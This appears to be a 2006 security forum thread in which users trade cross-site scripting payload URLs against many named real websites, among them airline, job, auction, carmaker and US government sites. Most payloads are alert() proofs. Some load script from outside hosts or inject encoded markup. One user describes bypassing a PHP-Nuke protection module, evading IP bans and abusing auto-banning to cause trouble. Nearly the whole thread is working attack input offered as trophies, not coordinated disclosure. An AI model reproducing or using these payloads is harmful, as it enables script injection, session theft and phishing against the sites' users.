WhiteAcid Wrote:
-------------------------------------------------------
> Here's one I enjoyed.
> I was searching for a specific post in this thread
> until I came across this one:
> http://cccure.org/modules.php?myh_op=show_all%3Csc
> ript%3Ealert(2)%3C/script%3E (well... it was
> something like that). That flaw has been fixed and
> they now have an error page. That error page has
> the user agent printed on it, using the flash and
> IE thing that was written about ages ago we can
> once again abuse this.
> http://www.whiteacid.org/misc/xss_headers.php?xss_
> target=http://cccure.org/modules.php?myh_op=show_a
> llalert(1)

I can't test that because it says "target = undefined" in Firefox, but if that's a widespread vulnerability in banned Nukesentinal pages, then you just took away the little bit of protection PHP-Nuke has. Oh well, you can still bypass Sentinal with "><script src=http://malicous.com/blah.jpg(js) .

It'll only work in IE. I've tried the flaw on phpnuke.org, but they have a different error page. On the other hand phpnuke-nederland.com does have the same error page which can also be exploited.
phpnuke-nederland.com: http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.phpnuke-nederland.com/?myh_op=show_all%3Cscript%3Ealert(1)%3C/script%3E&User-agent=%3Cscript%3Ealert(1)%3C/script%3E

Note that nuke-sentinel can optionally be set to ban your IP (?) from that site for some time. I'm now banned from phpnuke-nederland.com permanently. Good thing I wasn't using my home network, and a good thing my home networks IP is dynamic incase I want to go back for more later.

Edit: because of how it'll automatically bans your IP like that, you could cause havok on their site by doing

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 11/22/2006 04:46PM by WhiteAcid.

https://www.aa.com/apps/redirect/AACruises.jhtml?path=%0D%0A%0A%0D%3Cscript%3Ealert('xss');%3C/script%3Ehttp://
http://dodgeit.com/run/checkmail?mailbox=%3Cimg%20src=a%20onerror=alert('xss')%3E



Edited 1 time(s). Last edit at 11/23/2006 01:26PM by unsticky.

ca.hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?keywords_all=names&kw=nemessis"><script>alert('XSS')</script>

Click on the "Tell us what you think" link (at the bottom of the page).

Didn't work for me.

nemessis Wrote:
-------------------------------------------------------
> ca.hotjobs.yahoo.com/jobseeker/jobsearch/search_re
> sults.html?keywords_all=names&kw=nemessis">alert('
> XSS')
>
> Click on the "Tell us what you think" link (at the
> bottom of the page).

It works only with IE browser and you must click on "Tell us what you think" at the bottom of the page.



Edited 1 time(s). Last edit at 11/24/2006 05:31AM by nemessis.

Nice, it worked in IE.

Is this the right place to post something like this?

http://www.lemon64.com/giana/

Click on guestbook. Or use this direct link:

http://www.lemon64.com/giana/guestbook.php?action=view

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.securitypronews.com/submit.php&realname=asdf%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx securitypronews.com

-maluc

Hm. That _is_ security news. ;)

- RSnake
Gotta love it. http://ha.ckers.org

No XSS still funny though:
there might be holes, but i'm too lazy now sorry.

http://www.airfrance.us/cgi-bin/AF/US/en/local/include/initJsp.do?BV_SessionID=@@@@0725379830.1164531528@@@@&BV_EngineID=ccccaddjhfmmgdlcefecekedfnfdfoj.0

http://bsdvault.net/search.php?query=%22%3E%3CSCRIPT%3Ealert%28%22kefka%20was%20here%22%29%3C%2FSCRIPT%3E

Have one on me:


http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%27%7C%5F%5F%7C%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%5F%7C%7C%7C%7C%7E%7E+Up+in+SmOkE%27%29%3B%3C%2Fscript%3E%3C%22&code=noResultsFound



Edited 1 time(s). Last edit at 11/26/2006 03:22PM by jungsonn.

https://secure.customersvc.com/wes/servlet/Show?MSRSMAG=HA&WESTRANSITION=TRUE&PRIVACYLINK=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&NEWLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAnb%3Fsource_id%3D8&GIFTLINK=http%3A%2F%2Fsubs.timeinc.net%2FCampaignHandler%2FHAdnr%3Fsource_id%3D3&PUBLISHER=SPC&CUSTSERVLINK=www.health.com%2Fcustomerservice&RENEWLINK=%2Fservlet%2FShow%3FWESPAGE%3Dam%2FTransactions%2FRenewal%2Frenewal.jsp%26TR%3DREN&WESJSP=T&WESTCCJSP=T&WESRENEWIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Frenew&WESTCCIMAGEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fimages%2Ftcc&WESRENEWINCENTIVEDIR=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESRENEWINCENTIVEDIRTHANKS=%2Fwes%2FV5%2Fp01a%2Flib%2FinstalledApps%2FAMWebEAR.ear%2FAMWeb.war%2F%2Fam_ren%2Frenewal%2Foffers&WESERRORPAGE=am%2FServices%2Ferror.jsp&WESSTATEPAGE=am%2FState%2FTransactions%2Fload_home.txt&x=37&y=10

- RSnake
Gotta love it. http://ha.ckers.org

http://www.classmates.com/registration/city.jsp?cType=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&overseas=false&canada=false&sId=1&state=Ohio&cLetter=Y

- RSnake
Gotta love it. http://ha.ckers.org

http://www.hellboundhackers.org/index.php?asdf'onclick=alert(String.fromCharCode(88,83,83))// requires victim to click the ShoutBox in the bottom-right

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.caterham.co.uk/register/sales.php&title=&first=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&last=&country=UNITED+KINGDOM&othercountry=&tel=&email=&add1=&add2=&add3=&add4=&town=&postcode=&passwd1=&passwd2=&submit=Submit caterham.co.uk the guys who make the ever so sexy Super Seven

-maluc

http://www.gmc.com/vehiclelocator/gmc/locatevehicle.jsp?year=2007&modelId=none&mmc=none&brand=&originatingBrand=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E

Three main auction sites in Poland:

Allegro
https://ssl.allegro.pl/help.php?tid=%22%3E%3Cscript%3Edocument.write(String.fromCharCode(60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,115,108,97,46,99,107,101,114,115,46,111,114,103,34,62,115,108,97,46,99,107,101,114,115,46,111,114,103,60,47,97,62))%3C/script%3E%3Cnoscript%3E

Swistak
http://www.swistak.pl/haslo.html?e=s1&what=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

eBay
answercenter.ebay.pl/thread.jspa?threadID=1000000000&tstart=0&mod=';}alert('make_it_e.g._eval(String.fromCharCode(...))');{a='
//the same works for eBay.com:
answercenter.ebay.com/thread.jspa?threadID=1000033869&tstart=3&mod=';}alert('make_it_e.g._eval(String.fromCharCode(...))');{a='

Thanks, Maluc, but I gave up trying to make it a valid link and still working as an XSS ;)



Edited 3 time(s). Last edit at 11/28/2006 06:06PM by lpilorz.

We will, we will http://www53.rockyou.com/search_main.php?s_tsearch=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&p=1

- RSnake
Gotta love it. http://ha.ckers.org

ipil, you'll have to urlencode things to not break out of the link. if that doesnt work.. try using

[ u r l = blah ]link name[ / u r l ] (without the spaces)

not everything needs to be encoded, but always:
spaces to %20
" to %22
{ to %7B
} to %7D

then sometimes these:
( to %28
) to %29
; to %3B
= to %3D

your example one, without the million spaces, would be

http//answercenter.ebay.pl/thread.jspa?secure%20%20%20%20';%7Dalert('make_it_e.g._eval(String.fromCharCode(...))');%7Ba='%20&threadID=1000000000&tstart=0&mod=

http://answercenter.ebay.pl/thread.jspa?secure%20%20%20%20';%7Dalert('make_it_e.g._eval(String.fromCharCode(...))');%7Ba='%20&threadID=1000000000&tstart=0&mod=

i'd love to take a look at the code that causes these side effects ^^ (everything but space and " could likely be avoided)

-maluc

good find on the ebay one.. they're actually pretty tricky to find ones in. it took me a good hour before i had found one _-_

about 30times better than most ^^

-maluc

Hey this is my first post on these forums although i've been around for quite some time. Firstly I just want to say great work and this forum is very informative. Now to get back on topic, heres an XSS I found on PodZinger.

http://hak5.podzinger.com/results.jsp?filter=0&q=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&s=PZSID_videopods_videopod0_3_7_0003&s=PZSID_pods_pod3_3_1_0007&col=en-all-pod-ep

ironically, the FBI's form to 'Get e-mail updates when new scams and warnings are posted here'

http://service.govdelivery.com/service/action/authenticate?function=login&origin=&caller=subscribe.html&code=USFBI_11&partner_id=4617&category_id=&document_id=80035&edition_id=&format=&date=&time=&cookie_check=true&refreshOpener=&nextPage=&login=Mueller%20is%20watching%20You.%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx&button=Go&mailsender=default

don't scam people with it.

-maluc

Internet Crime Compliant Center

http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

National White Collar Crime Center

http://www.nw3c.org/%3Cbody%20onload=alert(%22XSS%22)%3E.cfm appending the .cfm is required.
Some referrer spoofing should work too

-maluc

well, that is really an adquate place here to talk about the topic.it is very valuable and considerable, and useful either in my eye, so thank you, man! wish you nice days everyday there!^_^

WhiteAcid Wrote:
-------------------------------------------------------
> http://www.marketwatch.com/tools/marketsummary/def
> ault.asp?siteid=mktw%22%0aalert(%22asd%22)//
> http://www.goldburse.com/> http://www.whiteacid.org/misc/xss_post_forwarder.p
> hp?xss_target=http://www.arto.com/brugere/login/de
> fault.asp?visopret=%26fc=0&destination=&returnUrl=
> &action=submit&brugernavn=%22%3E%3Cscript%3Ealert(
> 'xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%
> 20in%20the%20username%20field (using POST -
> actually arto.com)
well, but I think the answer looks so brilliant and considerable! that is great!^_^

https://search.putnam.com/search/perform?g_siteName=--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&g_queryText=%22%3Easdf

- RSnake
Gotta love it. http://ha.ckers.org

http://www.ezinedirector.com/subscriber/index.cfm?fuseaction=s&ezineId=956605769&email=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://www.corpwatch.org/search.php?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Search=Submit+Query

- RSnake
Gotta love it. http://ha.ckers.org